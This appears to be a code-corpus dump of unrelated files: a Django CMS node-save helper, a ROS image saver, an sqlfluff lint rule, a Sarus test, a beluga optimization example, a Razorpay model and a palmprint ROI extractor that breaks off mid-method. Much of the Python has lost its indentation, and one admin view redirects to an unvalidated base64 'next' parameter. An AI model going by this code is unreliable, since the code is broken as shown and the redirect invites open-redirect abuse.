self.parent = self.create_parent(creator=creator)
# Force Parent
if self.PARENT_URL:
try:
self.parent = Node.objects.exclude(
uuid=self.uuid).get(url=self.PARENT_URL, site=self.site)
except Node.DoesNotExist:
pass
# Related Node matches Parent
try:
if self._meta.get_field('related_node'):
self.related_node = self.parent
except FieldDoesNotExist:
pass
# Force Title
self.title = self.force_title()
# Set Slug
self.slug = urlclean_objname(self.title)
if not self.sluginstance:
self.sluginstance = 0
# Set URL
urlchanged = False
parent_url = self.parent.url if self.parent else self.PARENT_URL
oldurl = self.url
self.url = urlclean_remdoubleslashes('/{0}/{1}/{2}{3}{4}/'.format(
parent_url,
self.URL_PREFIX,
is_deleted,
urlclean_objname(self.slug),
'' if self.sluginstance == 0 else '-{0}'.format(self.sluginstance),
)
)
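    # Bump sluginstance until the generated URL is unique within this site.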
while Node.objects.filter(site=self.site).filter(url=self.url).exclude(
pk=self.pk).count() >= 1:
self.sluginstance += 1
self.url = urlclean_remdoubleslashes('/{0}/{1}/{2}{3}{4}/'.format(
parent_url,
self.URL_PREFIX,
is_deleted,
urlclean_objname(self.slug),
'' if self.sluginstance == 0 else '-{0}'.format(self.sluginstance),
)
)
if not is_new and (oldurl != self.url):
urlchanged = True
Thread(target=urlchanged_email, args=(self, oldurl)).start()
# # Set new name for file fields
# currentname = None
# newname = None
# # Image file field
# try:
# if self.image_file:
# currentname = findfileext_media(self.image_file.name)
# newname = image_upload_to(self, currentname[0] + currentname[1])
# currentname = '{0}/{1}{2}'.format(
# '/'.join(newname.split('/')[:-1]),
# currentname[0],
# currentname[1],
# )
# self.image_file.name = newname
# except AttributeError:
# pass
# # File file field
# try:
# if self.file_file:
# currentname = findfileext_media(self.file_file.name)
# newname = file_upload_to(self, currentname[0] + currentname[1])
# currentname = '{0}/{1}{2}'.format(
# '/'.join(newname.split('/')[:-1]),
# currentname[0],
# currentname[1],
# )
# self.file_file.name = newname
# except AttributeError:
# pass
# Set the node_title for the node
self.node_title = self.title
# Set the node type
self.node_type = self._meta.app_label
# Set the content type
self.content_type = self._meta.model_name
# if not self.menu_title:
# self.menu_title = self.title
# Set school year for events
try:
if self._meta.get_field('schoolyear'):
self.schoolyear = str(
currentyear(self.startdate)['currentyear']['long']
)
except FieldDoesNotExist:
pass
# Set yearend for events
if self.node_type == 'events':
try:
if self._meta.get_field('yearend'):
                self.yearend = str(
currentyear(self.startdate)['currentyear']['short']
)
except FieldDoesNotExist:
pass
# Does this item have permissions?
if self.HAS_PERMISSIONS:
self.has_permissions = True
else:
self.has_permissions = False
# Fix richtext anchor tags
    for field in self._meta.fields:
        if field.__class__ == RichTextField:
            field_value = getattr(self, field.name)
            if field_value:
                def rewrite_tags(value, tag_pattern, url_attr):
                    # Re-stamp data-id/data-processed on each matching tag
                    # so internal links track the Node they point at.
                    for tag in re.findall(tag_pattern, value):
                        try:
                            url = re.search(
                                r'(?:{0})=\"(.*?)\"'.format(url_attr),
                                tag,
                            ).groups()[0]
                        except AttributeError:
                            url = ''
                        try:
                            data_processed = re.search(
                                r'(?:data-processed)=\"(.*?)\"',
                                tag,
                            ).groups()[0]
                        except AttributeError:
                            data_processed = ''
                        if url != data_processed:
                            url_parsed = urlparse(url)
                            try:
                                site = Alias.objects.get(
                                    domain=url_parsed.netloc).site
                            except Alias.DoesNotExist:
                                site = None
                            try:
                                if site:
                                    node = Node.objects.get(
                                        url=url_parsed.path, site=site)
                                else:
                                    node = None
                            except Node.DoesNotExist:
                                node = None
                            rr = tag
                            rr = re.sub(
                                r'data-id=\".*?\"',
                                'data-id="{0}"'.format(
                                    str(node.pk) if node else ''),
                                rr)
                            rr = re.sub(
                                r'data-processed=\".*?\"',
                                'data-processed="{0}"'.format(url),
                                rr)
                            rr = re.sub(r'[ ]+', ' ', rr)
                            value = re.sub(re.escape(tag), rr, value)
                    return value
                field_value = rewrite_tags(
                    field_value, r'<a .*?</a>', 'href')
                field_value = rewrite_tags(
                    field_value, r'<img .*? />', 'src')
                setattr(self, field.name, field_value)
# Set Link URL to absolute URL
try:
if self._meta.get_field('link_url'):
self.link_url = link_url_absolute(self)
except FieldDoesNotExist:
pass
# Save the item
super(self._meta.model, self).save(*args, **kwargs)
# Set the section page count
if self.pagelayout.namespace == 'site-section.html':
node = objectfindnode(self)
node.section_page_count = len(
self
.get_children()
.filter(
node_type='pages',
content_type='page',
published=True,
deleted=False,
)
.exclude(
pagelayout__namespace='site-section.html',
)
)
node.save()
else:
node = objectfindnode(self)
node.section_page_count = 1
if self.parent:
if self.parent.pagelayout.namespace == 'site-section.html':
self.parent.section_page_count = len(
self.parent
.get_children()
.filter(
node_type='pages',
content_type='page',
published=True,
deleted=False,
)
.exclude(
Q(pagelayout__namespace='site-section.html') |
Q(pk=self.pk),
)
)
if self.published and not self.deleted:
self.parent.section_page_count += 1
self.parent.save()
node.save()
# # Move Directories for children then parent.
if urlchanged:
        # Save children to update their URLs and move their directories.
for child in self.get_children():
object = nodefindobject(child)
object.save()
# # Move Directory
# silentmove_media(
# settings.MEDIA_ROOT + oldurl,
# settings.MEDIA_ROOT + self.url
# )
# # Move File
# if currentname != newname:
# oldpath = '{0}/{1}'.format(settings.MEDIA_ROOT, currentname)
# newpath = '{0}/{1}'.format(settings.MEDIA_ROOT, newname)
# silentmove_media(oldpath, newpath)
# # Commenting file moves because newly uploaded files
# # think they are moving on upload.
# # filepath_email(self, oldpath, newpath)
related_resource_links(self)
clearcache(self)
# Model Inheritance Object
def nodefindobject(node):
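    """Resolve a generic Node row to its concrete model instance."""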
return apps.get_model(
node.node_type + '.' + node.content_type).objects.get(pk=node.pk)
def objectfindnode(object):
Node = apps.get_model('objects', 'node')
return Node.objects.get(pk=object.pk)
# MPTT Tree Functions
def resetchildrentoalphatitle():
Node = apps.get_model('objects', 'node')
top = Node.objects.filter(node_type='pages').get(
node_title='Charter Schools')
children = top.get_children()
children = children.order_by('node_title')
parent = children[0]
parent.move_to(top, position='first-child')
for child in children[1:]:
parent = Node.objects.get(pk=parent.pk)
child = Node.objects.get(pk=child.pk)
child.move_to(parent, position='right')
        print('Moving {0} after {1}'.format(child, parent))
parent = child
# Cache Functions
def clearcache(object):
pass
def save_formset(self, request, form, formset, change):
# formset.save() returns instances but
# I do not need them so I am not storing them.
formset.save(commit=False)
for obj in formset.deleted_objects:
obj.delete()
for obj in formset.new_objects:
obj.create_user = request.user
obj.update_user = request.user
obj.site = request.site
try:
if not obj.primary_contact:
obj.primary_contact = request.user
except AttributeError:
pass
obj.save()
for obj in formset.changed_objects:
obj[0].update_user = request.user
obj[0].save()
formset.save_m2m()
def save_model(self, request, obj, form, change):
if getattr(obj, 'create_user', None) is None:
obj.create_user = request.user
obj.update_user = request.user
if getattr(obj, 'site', None) is None:
obj.site = request.site
super(self.__class__, self).save_model(request, obj, form, change)
def response_change(self, request, obj):
if 'next' in request.GET:
opts = self.model._meta
pk_value = obj._get_pk_val()
preserved_filters = self.get_preserved_filters(request)
msg_dict = {
'name': force_text(opts.verbose_name),
'obj': format_html(
'<a class="editlink" href="{}">{}</a>',
urlquote(request.path), obj),
}
if "_continue" in request.POST:
msg = format_html(
                    _('The {name} "{obj}" was changed successfully. '
                      'You may edit it again below.'),
**msg_dict
)
self.message_user(request, msg, messages.SUCCESS)
redirect_url = request.get_full_path()
redirect_url = add_preserved_filters({
'preserved_filters': preserved_filters,
'opts': opts}, redirect_url)
return HttpResponseRedirect(redirect_url)
if '_continue' not in request.POST:
msg = format_html(
_('The {name} "{obj}" was changed successfully.'),
**msg_dict
)
self.message_user(request, msg, messages.SUCCESS)
return HttpResponseRedirect(
base64.b64decode(request.GET['next']).decode('utf-8'))
return super(self.__class__, self).response_change(request, obj)
def get_management_website():
Site = apps.get_model('sites', 'site')
try:
return Site.objects.only('pk').get(name='Website Management').pk
except Site.DoesNotExist:
return ''
def get_district_office():
Location = apps.get_model('taxonomy', 'location')
try:
return Location.objects.only('pk').get(title='District Office').pk
except Location.DoesNotExist:
return ''
def get_districtcalendareventcategory_general():
DistrictCalendarEventCategory = apps.get_model(
'taxonomy',
'districtcalendareventcategory'
)
try:
return DistrictCalendarEventCategory.objects.only('pk').get(
title='General Event').pk
except DistrictCalendarEventCategory.DoesNotExist:
return ''
def get_webmaster(pk=True):
User = apps.get_model('objects', 'user')
try:
webmaster = User.objects.get(username='<EMAIL>')
if pk:
return webmaster.pk
else:
return webmaster
except User.DoesNotExist:
return ''
def get_default_pagelayout(pk=True):
PageLayout = apps.get_model('dashboard', 'pagelayout')
try:
layout = PageLayout.objects.get(title='Default')
if pk:
return layout.pk
else:
return layout
except PageLayout.DoesNotExist:
return ''
def get_contactpage(request, pk=True):
Node = apps.get_model('objects', 'node')
try:
page = Node.objects.get(node_title='Contact Us', site=request.site)
if pk:
return page.pk
else:
return page
except Node.DoesNotExist:
return ''
def currentyear(date=None):
    # Evaluate "now" at call time; a default argument of timezone.now()
    # would be frozen once at import time.
    if date is None:
        date = timezone.now()
    if date.month >= 7:
        currentyearkey = date.year + 1
        currentyearstring = str(date.year) + '-' + str(date.year + 1)[2:]
    else:
        currentyearkey = date.year
        currentyearstring = str(date.year - 1) + '-' + str(date.year)[2:]
    currentyear = {"short": currentyearkey, "long": currentyearstring}
    return {'currentyear': currentyear}
def next_tuesday_sixthrity():
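    """Return the upcoming Tuesday at 18:30 (today if already Tuesday) as an aware datetime."""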
now = timezone.datetime.strptime(
timezone.datetime.now().strftime('%Y-%m-%d %H:%M'), '%Y-%m-%d %H:%M')
while now.weekday() != 1:
now += timedelta(days=1)
now += timedelta(hours=18 - int(now.strftime('%H')))
now += timedelta(minutes=30 - int(now.strftime('%M')))
return timezone.make_aware(now)
def tomorrow_midnight():
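    """Return tomorrow at 00:00 as an aware datetime."""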
now = timezone.datetime.strptime(
timezone.datetime.now().strftime('%Y-%m-%d %H:%M'), '%Y-%m-%d %H:%M')
now += timedelta(days=1)
now += timedelta(hours=0 - int(now.strftime('%H')))
now += timedelta(minutes=0 - int(now.strftime('%M')))
return timezone.make_aware(now)
def december_thirty_first():
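    """Return December 31 of the current year at 00:00 as an aware datetime."""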
now = timezone.datetime.strptime(
timezone.datetime.now().strftime('%Y-%m-%d %H:%M'), '%Y-%m-%d %H:%M')
return timezone.make_aware(
timezone.datetime(now.year, 12, 31, 00, 00)
)
def file_name(self):
    if (
        self.parent.node_type == 'documents' and
        self.parent.content_type in (
            'document',
            'policy',
            'administrativeprocedure',
            'supportingdocument',
            'boardmeetingexhibit',
            'boardmeetingagendaitem',
        )
    ):
        return '{0}-{1}{2}'.format(
            self.parent.slug,
            self.slug,
            findfileext_media(self.file_file.url)[1],
        )
    if (
        self.parent.node_type == 'documents' and
        self.parent.content_type in (
            'boardmeetingagenda',
            'boardmeetingminutes',
        )
    ):
        return '{0}-{1}-{2}{3}'.format(
            self.parent.parent.slug,
            self.parent.slug,
            self.slug,
            findfileext_media(self.file_file.url)[1],
        )
    if (
        self.parent.node_type == 'documents' and
        self.parent.content_type in (
            'boardmeetingaudio',
            'boardmeetingvideo',
        )
    ):
        return '{0}-{1}{2}'.format(
            self.parent.parent.slug,
            self.parent.slug,
            findfileext_media(self.file_file.url)[1],
        )
    if (
        self.node_type == 'images' and
        self.content_type in (
            'thumbnail',
            'newsthumbnail',
            'pagebanner',
            'contentbanner',
            'profilepicture',
            'districtlogogif',
            'districtlogojpg',
            'districtlogopng',
            'districtlogotif',
            'districtlogo',
            'photogalleryimage',
            'inlineimage',
        )
    ):
        return '{0}{1}'.format(
            self.slug,
            findfileext_media(self.image_file.url)[1],
        )
    if (
        self.node_type == 'files' and
        self.content_type == 'precinctmap'
    ):
        return '{0}{1}'.format(
            self.slug,
            findfileext_media(self.file_file.url)[1],
        )
customerror_emailadmins(
'Missing File Name',
'Missing file name for: '
'{0} with node type: {1} and content type: {2}'.format(
self.pk,
self.node_type,
self.content_type,
)
)
    return 'unknown'
def name_dot_field_dot_ext(generator):
"""
A namer that, given the following source file name::
photos/thumbnails/bulldog.jpg
will generate a name like this::
/path/to/generated/images/{image.pk}.{specfield}.{ext}
where "/path/to/generated/images/" is the value specified by the
``IMAGEKIT_CACHEFILE_DIR`` setting.
"""
source_filename = getattr(generator.source, 'name', None)
if 'specfield' in generator.options:
specfield = generator.options['specfield']
else:
raise Exception('Spec Field Options Must Include Spec Field Name.')
    cache_dir = settings.IMAGEKIT_CACHEFILE_DIR
    ext = suggest_extension(source_filename or '', generator.format)
    basename = os.path.basename(source_filename)
    returnpath = os.path.normpath(os.path.join(cache_dir, '%s.%s%s' % (
        os.path.splitext(basename)[0], specfield, ext)))
return returnpath
def related_resource_links(self):
    if self.node_type == 'pages' and self.content_type == 'school':
        school_links = (
            ('website_url', 'School Website'),
            ('scc_url', 'School Community Council'),
            ('calendar_url', 'School Calendar'),
            ('donate_url', 'Make a Donation'),
        )
        for field_name, link_title in school_links:
            url_value = getattr(self, field_name)
            if url_value:
                link, created = self.links_resourcelink_node.get_or_create(
                    related_locked=field_name,
                    parent=self,
                    site=self.site,
                    defaults={
                        'title': link_title,
                        'link_url': url_value,
                        'related_locked': True,
                    }
                )
                link.title = link_title
                link.link_url = url_value
                link.related_locked = field_name
                link.related_type = '{0}-{1}'.format(
                    self.node_type,
                    self.content_type,
                )
                link.deleted = False
                link.published = True
                link.save()
            else:
                try:
                    link = self.links_resourcelink_node.get(
                        related_locked=field_name
                    )
                    if link:
                        link.published = False
                        link.delete()
                except self.links_resourcelink_node.model.DoesNotExist:
                    pass
if self.node_type == 'documents' and self.content_type == 'document':
link, created = self.parent.links_resourcelink_node.get_or_create(
related_locked=str(self.uuid),
parent=self.parent,
site=self.site,
defaults={
'title': self.title,
'link_url': self.url,
'related_locked': True,
}
)
link.title = self.title
link.link_url = self.url
link.related_locked = str(self.uuid)
link.related_type = '{0}-{1}'.format(
self.node_type,
self.content_type,
)
link.deleted = self.deleted
link.published = self.published
doc_len = len(
self
.files_file_node
.filter(deleted=0)
.filter(published=1)
.filter(file_file__isnull=False)
)
if doc_len < 1:
link.published = False
elif doc_len > 1:
link.published = self.published
link.modal_ajax = True
link.target_blank = False
else:
link.published = self.published
link.modal_ajax = False
link.target_blank = True
link.save()
    if self.node_type == 'pages' and self.content_type in (
            'subpage', 'boardsubpage'):
        link, created = self.parent.links_resourcelink_node.get_or_create(
            related_locked=str(self.uuid),
            parent=self.parent,
            site=self.site,
            defaults={
                'title': self.title,
                'link_url': self.url,
                'related_locked': True,
            }
        )
        link.title = self.title
        link.link_url = self.url
        link.related_locked = str(self.uuid)
        link.related_type = '{0}-{1}'.format(
            self.node_type,
            self.content_type,
        )
        link.deleted = self.deleted
        link.published = self.published
        link.save()
if self.node_type == 'files':
related_resource_links(nodefindobject(self.parent))
def get_domain(site):
if settings.ENVIRONMENT_MODE == "development":
try:
site = Alias.objects.get(domain__contains='-dev', site=site)
except Alias.DoesNotExist:
pass
if settings.ENVIRONMENT_MODE == "test":
try:
site = Alias.objects.get(domain__contains='-test', site=site)
except Alias.DoesNotExist:
pass
return site.domain
def is_siteadmin(request):
if (
request.user.is_superuser or
request.user.groups.filter(name='Website Managers') or
request.site.dashboard_sitepublisher_site.filter(
account=request.user.pk)
):
return True
return False
def is_globaladmin(request):
if (
request.user.is_superuser or
request.user.groups.filter(name='Website Managers')
):
return True
return False
def link_url_absolute(self):
input_url = urlsplit(self.link_url)
working_url = list(input_url)
if self.link_url:
if not working_url[1]:
working_url[0] = 'https'
working_url[1] = self.site.domain
return urlunsplit(working_url)
def can_edit_page(node):
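    """Collect every account allowed to edit ``node``, keyed by pk with roles."""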
# Get Required Models
Employee = apps.get_model('users', 'Employee')
PageEditor = apps.get_model('users', 'PageEditor')
# Define the ordered dic to track all users
all_users = OrderedDict()
# Find all superusers
for username in (
Employee
.objects
.filter(
is_active=1,
deleted=0,
published=1,
is_superuser=1)
.values('pk', 'username')
):
if username['pk'] in all_users:
all_users[username['pk']]['roles'].append('superuser')
else:
all_users[username['pk']] = {
'username': username['username'], 'roles': ['superuser']}
# Find all website managers
for username in (
Employee
.objects
.filter(
is_active=1,
deleted=0,
published=1,
groups__name='Website Managers'
)
.values('pk', 'username')
):
if username['pk'] in all_users:
all_users[username['pk']]['roles'].append('website_manager')
else:
all_users[username['pk']] = {
'username': username['username'], 'roles': ['website_manager']}
# Final site publishers
for username in (
node
.site
.dashboard_sitepublisher_site
.all()
.only('account')
):
if username.account.is_active:
if username.account.pk in all_users:
all_users[username.account.pk]['roles'].append(
'site_publisher')
else:
all_users[username.account.pk] = {
'username': username.account.username, 'roles': ['site_publisher']}
# Find direct page editors for the node
for username in (
node
.users_pageeditor_node
.filter(
deleted=0,
employee__is_active=1,
employee__deleted=0,
employee__published=1
)
.values('employee__pk', 'employee__username')
):
if username['employee__pk'] in all_users:
all_users[username['employee__pk']]['roles'].append('page_editor')
else:
all_users[username['employee__pk']] = {
'username': username['employee__username'], 'roles': ['page_editor']}
# Find all parent nodes and their page editors
    for ancestor in (
        node
        .get_ancestors()
        .filter(
            deleted=0,
            published=1
        )
    ):
        for username in (
            ancestor
            .users_pageeditor_node
            .filter(
                deleted=0,
                employee__is_active=1,
                employee__deleted=0,
                employee__published=1
            )
            .values('employee__pk', 'employee__username')
        ):
            if username['employee__pk'] in all_users:
                all_users[username['employee__pk']]['roles'].append(
                    'inherited_page_editor')
            else:
                all_users[username['employee__pk']] = {
                    'username': username['employee__username'],
                    'roles': ['inherited_page_editor']}
# Return the ordered dict
return all_users
| 1.820313 | 2 |
ros/src/util/packages/data_preprocessor/scripts/get_ImageTopic.py | baharkhabbazan/autoware | 64 | 12769994 | #!/usr/bin/env python
import sys
import os
import rospy
import numpy as np
import cv2
import pcl
from get_rosbaginfo import get_type_and_topic, get_baginfo
import sensor_msgs.point_cloud2 as pc2
from sensor_msgs.msg import Image, PointCloud2
from cv_bridge import CvBridge
class ImageSaver(object):
def __init__(self, save_path, output_type, bagfile, topic):
self.save_path = save_path
self.topic = topic
self.output_type = output_type
self.bagfile = bagfile
self.img_datasets = []
def img_loader(self, image_msg):
bridge = CvBridge()
rospy.loginfo(image_msg.encoding)
print(image_msg.height)
camera_img = bridge.imgmsg_to_cv2(image_msg, "bgr8")
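        # Combine the ROS header's seconds and nanoseconds into one float.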
timestamp = image_msg.header.stamp.secs + ((image_msg.header.stamp.nsecs + 0.0) / 1000000000)
if self.output_type == "image":
self.save_image(camera_img, timestamp, '1')
elif self.output_type == "h5file":
self.save_h5file(camera_img, timestamp)
def save_image(self, img, timestamp, sfx):
cv2.imwrite(self.save_path + '/camera_' + sfx + '_' + "{:.5f}".format(timestamp) + '.png', img)
def save_h5file(self, img, timestamp):
print(timestamp)
a = get_baginfo(self.bagfile)
print(a[self.topic][1])
def process(self):
node_name = "get_%s_and_convert_to_RGB_Image" % self.topic
rospy.init_node('rosbag_data_extract_unsync', anonymous=True)
rospy.Subscriber(self.topic, Image, self.img_loader)
rospy.spin()
def rosbag_data_extract_sample():
try:
save_path = sys.argv[1]
topic = sys.argv[2]
output_type = "image"
bagfile = "/home/katou01/.autoware/autoware-201701171120.bag"
    except Exception:
sys.exit("Please specify the save path. Example: rosbag_data_extract_unsync.py /media/0/output/")
image_saver = ImageSaver(save_path, output_type, bagfile, topic)
image_saver.process()
# node_name = "get_%s_and_convert_to_RGB_Image" % topic
# rospy.init_node('rosbag_data_extract_unsync', anonymous=True)
#
# rospy.Subscriber(topic, Image, img_loader)
# rospy.spin()
if __name__ == '__main__':
rosbag_data_extract_sample()
| 2.4375 | 2 |
src/sqlfluff/core/rules/std/L001.py | netlify/sqlfluff | 2 | 12769995 | """Implementation of Rule L001."""
from sqlfluff.core.rules.base import BaseRule, LintResult, LintFix
from sqlfluff.core.rules.doc_decorators import document_fix_compatible
@document_fix_compatible
class Rule_L001(BaseRule):
"""Unnecessary trailing whitespace.
| **Anti-pattern**
| The • character represents a space.
.. code-block::
SELECT
a
FROM foo••
| **Best practice**
| Remove trailing spaces.
.. code-block::
SELECT
a
FROM foo
"""
def _eval(self, segment, raw_stack, **kwargs):
"""Unnecessary trailing whitespace.
Look for newline segments, and then evaluate what
it was preceded by.
"""
# We only trigger on newlines
if (
segment.is_type("newline")
and len(raw_stack) > 0
and raw_stack[-1].is_type("whitespace")
):
# If we find a newline, which is preceded by whitespace, then bad
deletions = []
idx = -1
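            # Walk backwards, collecting the whole run of trailing whitespace
            # so it can be removed in a single fix.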
while raw_stack[idx].is_type("whitespace"):
deletions.append(raw_stack[idx])
idx -= 1
return LintResult(
anchor=deletions[-1], fixes=[LintFix("delete", d) for d in deletions]
)
return LintResult()
| 2.59375 | 3 |
CI/src/integration_tests/test_image_with_symlink_over_directory.py | tdhooks/sarus | 84 | 12769996 | # Sarus
#
# Copyright (c) 2018-2021, ETH Zurich. All rights reserved.
#
# Please, refer to the LICENSE file in the root directory.
# SPDX-License-Identifier: BSD-3-Clause
import unittest
import common.util as util
class TestImageWithSymlinkOverDirectory(unittest.TestCase):
"""
These tests simply pull and run an image where a directory was
created in a layer and then replaced with a symlink in a later layer.
"""
_IMAGE_NAME = "quay.io/ethcscs/sarus-integration-tests:symlink-over-directory"
def test_image_with_symlink_over_directory(self):
util.remove_image_if_necessary(is_centralized_repository=False, image=self._IMAGE_NAME)
util.pull_image_if_necessary(is_centralized_repository=False, image=self._IMAGE_NAME)
output = util.run_command_in_container(is_centralized_repository=False,
image=self._IMAGE_NAME,
command=["ls", "/usr/local/test".encode('utf-8')])
assert output[0] == "file"
output = util.run_command_in_container(is_centralized_repository=False,
image=self._IMAGE_NAME,
command=["realpath", "/usr/local/test".encode('utf-8')])
assert output[0] == "/opt/test"
| 2.0625 | 2 |
Sets/12_Check Subset.py | FaranakAlikhah/ADM-HW1 | 0 | 12769997 | #!/usr/bin/env python
# coding: utf-8
# # *Section 4: Sets*
#
# ### Writer: <NAME> 1954128
# ### 12. Check Subset:
#
#
# In[ ]:
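# For each test case read: len(A), the elements of A, len(B), the elements
# of B; then print whether A is a subset of B.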
num_testCase=int(input())
for i in range(num_testCase):
num_testCase1=int(input())
a=set(input().split())
num_testCase2=int(input())
b=set(input().split())
print(a.issubset(b))
#
| 3.015625 | 3 |
examples/Mansell/Hannibal.py | Rapid-Design-of-Systems-Laboratory/beluga-legacy | 1 | 12769998 | #==================================================================================
# PROGRAM: "Hannibal.py"
# LOCATION: beluga>examples>Mansell
# Author: <NAME> (2016)
#
# Description: Preliminary test of a track path optimization using a user-defined
# terrain elevation profile.
#==================================================================================
#Import Necessary Modules
import numpy as np
import beluga.bvpsol as bvpsol
import beluga.bvpsol.algorithms as algorithms
import beluga.optim.Problem
from beluga.optim.problem import *
from beluga.continuation import *
from math import *
import functools
def get_problem():
"""A simple test of optimal surface track planning."""
# Rename this and/or move to optim package?
problem = beluga.optim.Problem('Hannibal')
#Define independent variables
problem.independent('t', 's')
# Define equations of motion
problem.state('x','V*cos(hdg)','m') \
.state('y','V*sin(hdg)','m') \
# Define controls
problem.control('hdg','rad')
# Define Cost Functional
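    # The running cost blends travel time (weight 1-w) with terrain elevation
    # sampled along the track (weight w); the elevation surface is a sum of
    # Gaussian bumps plus a sinusoidal ripple.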
problem.cost['path'] = Expression('(1-w)+w*V*conv*elev*(-0.3*exp(-0.5*((x-2.7)^2+1.5*(y-2.1)^2))+2.6*exp(-0.55*(0.87*(x-6.7)^2+(y-2.2)^2))+2.1*exp(-0.27*(0.2*(x-5.5)^2+(y-7.2)^2))+1.6*(cos(0.8*y))^2*(sin(0.796*x))^2)', 's')
#Define constraints
problem.constraints().initial('x-x_0','m') \
.initial('y-y_0','m') \
.terminal('x-x_f','m') \
.terminal('y-y_f','m')
#Define constants
problem.constant('w',0.0,'1') #Initial Terrain weighting factor
problem.constant('conv',1,'s/m^2') #Integral conversion factor
problem.constant('V',1,'m/s') #Vehicle speed
problem.constant('elev',1,'m') #Initial Elevation
#Unit scaling
problem.scale.unit('m',1) \
.unit('s',1) \
.unit('rad',1)
#Configure solver
problem.bvp_solver = algorithms.MultipleShooting(derivative_method='fd',tolerance=1e-4, max_iterations=1000, verbose = True, cached = False, number_arcs=4)
#Initial Guess
problem.guess.setup('auto',start=[4.9,0.4], costate_guess=[0.1,-0.1]) #City A
#Add Continuation Steps
problem.steps.add_step().num_cases(30) \
.terminal('x', 7.2) \
.terminal('y', 8.5)
problem.steps.add_step().num_cases(30) \
.const('w',0.5) #Final Terrain weighting factor
return problem
if __name__ == '__main__':
import beluga.Beluga as Beluga
problem = get_problem()
sol = Beluga.run(problem)
| 2.765625 | 3 |
pymeterreader/core/channel_upload_info.py | Schwaneberg/pymeterreader | 5 | 12769999 | import typing as tp
from dataclasses import dataclass
from datetime import datetime, timedelta
@dataclass()
class ChannelUploadInfo:
"""
Channel Upload info structure
:param uuid: uuid of db entry to feed
:param interval: interval between readings in seconds
    :param factor: factor to multiply original values by, e.g. to convert kWh to Wh
:param last_upload: time of last upload to middleware
:param last_value: last value in middleware
"""
uuid: str
interval: timedelta
factor: float
last_upload: datetime
last_value: tp.Union[int, float]
| 2.90625 | 3 |
app/razorpay_gateway/models.py | S3Infosoft/s3-loyalty-webapp | 0 | 12770000 | from django.db import models
from django.utils import timezone
import datetime
# Create your models here.
class PurchaseOrder(models.Model):
    razorpay_payment_id = models.CharField(max_length=100)
    razorpay_order_id = models.CharField(max_length=100)
    razorpay_signature = models.CharField(max_length=500)
    user_unique_id = models.CharField(max_length=40)
    user_email = models.EmailField(max_length=30)
    amount_debited = models.FloatField(max_length=20)
    points_added = models.IntegerField()
    date = models.CharField(max_length=50, default=timezone.now)
def __str__(self):
return self.user_email
| 2.40625 | 2 |
PROIE.py | yyaddaden/PROIE | 5 | 12770001 | # -*- coding: UTF-8 -*-
import cv2
import matplotlib.pyplot as plt
import numpy as np
class PROIE():
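    """Palmprint Region Of Interest Extraction.

    A minimal usage sketch (image paths here are hypothetical, not part of
    the original module)::

        proie = PROIE()
        proie.extract_roi('hand.jpg', rotate=False)
        proie.show_result()
        proie.save('roi.png')
    """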
def __init__(self):
#####
pass
# PRIVATE METHODS
def _threshold(self):
#####
self.blur_img = cv2.GaussianBlur(self.in_img_g, (5, 5), 0)
_, self.thresh_img = cv2.threshold(
self.blur_img, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
def _contours(self):
#####
self.contours, _ = cv2.findContours(
self.thresh_img, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
self.contours = self.contours[0]
self.contour_img = self.in_img_c.copy()
self.contour_img = cv2.drawContours(
self.contour_img, [self.contours], 0, (255, 0, 0), 2)
def _landmarks(self):
#####
M = cv2.moments(self.thresh_img)
x_c = M['m10'] // M['m00']
y_c = M['m01'] // M['m00']
self.center_point = {"x": x_c, "y": y_c}
self.contours = self.contours.reshape(-1, 2)
left_id = np.argmin(self.contours.sum(-1))
self.contours = np.concatenate(
[self.contours[left_id:, :], self.contours[:left_id, :]])
dist_c = np.sqrt(np.square(
self.contours-[self.center_point["x"], self.center_point["y"]]).sum(-1))
f = np.fft.rfft(dist_c)
cutoff = 15
f_new = np.concatenate([f[:cutoff], 0*f[cutoff:]])
dist_c_1 = np.fft.irfft(f_new)
derivative = np.diff(dist_c_1)
sign_change = np.diff(np.sign(derivative))/2
self.landmarks = {"x": [], "y": []}
for landmark in self.contours[np.where(sign_change > 0)[0]]:
self.landmarks["x"].append(landmark[0])
self.landmarks["y"].append(landmark[1])
def _landmarks_select(self):
#####
y_rank = np.array(np.argsort(self.landmarks["y"]))
self.landmarks_selected = {"x": np.array(self.landmarks["x"])[
y_rank][:3], "y": np.array(self.landmarks["y"])[y_rank][:3]}
x_rank = np.array(np.argsort(self.landmarks_selected["x"]))
self.landmarks_selected = {
"x": self.landmarks_selected["x"][x_rank][[0, 2]], "y": self.landmarks_selected["y"][x_rank][[0, 2]]}
def _alignement(self):
#####
h, w = self.in_img_g.shape
theta = np.arctan2((self.landmarks_selected["y"][1] - self.landmarks_selected["y"][0]), (
self.landmarks_selected["x"][1] - self.landmarks_selected["x"][0]))*180/np.pi
R = cv2.getRotationMatrix2D(
(self.landmarks_selected["x"][1], self.landmarks_selected["y"][1]), theta, 1)
self.align_img = cv2.warpAffine(self.in_img_g, R, (w, h))
point_1 = [self.landmarks_selected["x"]
[0], self.landmarks_selected["y"][0]]
point_2 = [self.landmarks_selected["x"]
[1], self.landmarks_selected["y"][1]]
        point_1 = (R[:, :2] @ point_1 + R[:, -1]).astype(int)
        point_2 = (R[:, :2] @ point_2 + R[:, -1]).astype(int)
self.landmarks_selected_align = {
"x": [point_1[0], point_2[0]], "y": [point_1[1], point_2[1]]}
def _roi_extract(self):
#####
point_1 = np.array([self.landmarks_selected_align["x"]
[0], self.landmarks_selected_align["y"][0]])
point_2 = np.array([self.landmarks_selected_align["x"]
[1], self.landmarks_selected_align["y"][1]])
self.ux = point_1[0]
self.uy = point_1[1] + (point_2-point_1)[0]//3
self.lx = point_2[0]
self.ly = point_2[1] + 4*(point_2-point_1)[0]//3
self.roi_zone_img = cv2.cvtColor(self.align_img, cv2.COLOR_GRAY2BGR)
cv2.rectangle(self.roi_zone_img, (self.lx, self.ly),
(self.ux, self.uy), (0, 255, 0), 2)
self.roi_img = self.align_img[self.uy:self.ly, self.ux:self.lx]
# PUBLIC METHODS
def extract_roi(self, path_in_img, rotate=False):
#####
self.in_img_c = cv2.imread(path_in_img)
if(rotate):
self.in_img_c = cv2.rotate(self.in_img_c, cv2.ROTATE_90_CLOCKWISE)
if len(self.in_img_c.shape) == 3:
self.in_img_g = cv2.cvtColor(self.in_img_c, cv2.COLOR_BGR2GRAY)
else:
self.in_img_g = self.in_img_c
self._threshold()
self._contours()
self._landmarks()
self._landmarks_select()
self._alignement()
self._roi_extract()
def save(self, path_out_img):
#####
